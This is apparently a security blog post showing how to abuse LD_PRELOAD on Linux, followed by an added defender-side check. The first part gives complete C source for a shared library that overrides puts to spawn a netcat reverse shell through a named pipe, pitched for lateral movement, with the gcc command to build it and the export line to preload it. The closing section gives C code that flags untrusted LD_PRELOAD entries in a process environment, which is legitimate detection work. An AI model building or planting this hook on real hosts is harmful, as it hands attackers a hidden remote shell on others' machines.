Abusing LD_PRELOAD for Reverse Shell via Hooking Functions
A replacement puts function that launches a reverse shell, used here for lateral movement, is compiled as a shared library (.so). When the library's path is set in the LD_PRELOAD environment variable, the dynamic linker loads it ahead of libc, so the malicious code runs whenever a dynamically linked program started with that environment calls puts.
Here is the C code:
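
    #include <stdio.h>
    #include <unistd.h>
    #include <dlfcn.h>
    #include <stdlib.h>

    /* Same name and signature as libc's puts, so this definition is
       resolved first when the library is preloaded. */
    int puts(const char *message) {
        int (*new_puts)(const char *message);

        /* Look up the next definition of puts in load order (the real one). */
        new_puts = dlsym(RTLD_NEXT, "puts");

        /* execl replaces the calling process with /bin/sh running the
           reverse-shell pipeline; it returns only if it fails. */
        execl("/bin/sh", "sh", "-c", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 666 >/tmp/f", (char *) NULL);

        /* Reached only when execl fails: call the real puts. */
        return new_puts("DEPLOYING...SHELL");
    }
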
To compile the shared object:

    malefic@xccvltvm:~$ gcc hook.c -o hook.so -fPIC -shared -ldl -D_GNU_SOURCE

Then, set the LD_PRELOAD environment variable:

    malefic@xccvltvm:~$ export LD_PRELOAD="/home/malefic/hook.so"
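
A defender-side check for the technique above, added here as an example and not part of the original post: it parses a captured /proc/<pid>/environ block, extracts LD_PRELOAD, and counts entries that fall outside an allow-list of library directories. The allow-list, the function names and the sample buffer are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
/* Assumed allow-list of directories that legitimate preloads come from. */
static const char *TRUSTED[] = { "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", NULL };

/* Return the value of NAME in a NUL-separated environ block, or NULL. */
static const char *env_lookup(const char *env, size_t len, const char *name) {
    size_t nlen = strlen(name);
    const char *end = env + len;
    for (const char *p = env; p < end; ) {
        const char *nul = memchr(p, '\0', (size_t)(end - p));
        if (!nul) break;                 /* truncated final entry: ignore it */
        if ((size_t)(nul - p) > nlen && p[nlen] == '=' && memcmp(p, name, nlen) == 0)
            return p + nlen + 1;
        p = nul + 1;
    }
    return NULL;
}

/* Lexical check only (symlinks are not resolved): the entry must be an
   absolute path under a trusted directory and contain no "/.." sequence. */
static int is_trusted(const char *path, size_t n) {
    if (path[0] != '/') return 0;        /* bare or relative names need review */
    for (size_t i = 0; i + 3 <= n; i++)
        if (memcmp(path + i, "/..", 3) == 0) return 0;
    for (int k = 0; TRUSTED[k]; k++) {
        size_t t = strlen(TRUSTED[k]);
        if (n > t && memcmp(path, TRUSTED[k], t) == 0) return 1;
    }
    return 0;
}

/* Count LD_PRELOAD entries outside the allow-list; -1 if LD_PRELOAD is unset. */
int suspicious_preloads(const char *env, size_t len) {
    const char *v = env_lookup(env, len, "LD_PRELOAD");
    if (!v) return -1;
    int bad = 0;
    while (*v) {
        size_t n = strcspn(v, ": ");     /* ld.so splits the list on ':' and ' ' */
        if (n > 0 && !is_trusted(v, n)) bad++;
        v += n + (v[n] != '\0');
    }
    return bad;
}

int main(void) {
    /* Constructed sample of a /proc/<pid>/environ block (NUL-separated). */
    static const char sample[] = "HOME=/home/malefic\0LD_PRELOAD=/home/malefic/hook.so\0SHELL=/bin/bash";
    printf("suspicious preload entries: %d\n", suspicious_preloads(sample, sizeof sample));
    return 0;
}
```

On a live host, read /proc/<pid>/environ as binary and pass the buffer with its length; /etc/ld.so.preload, which the dynamic linker applies system-wide, deserves the same review.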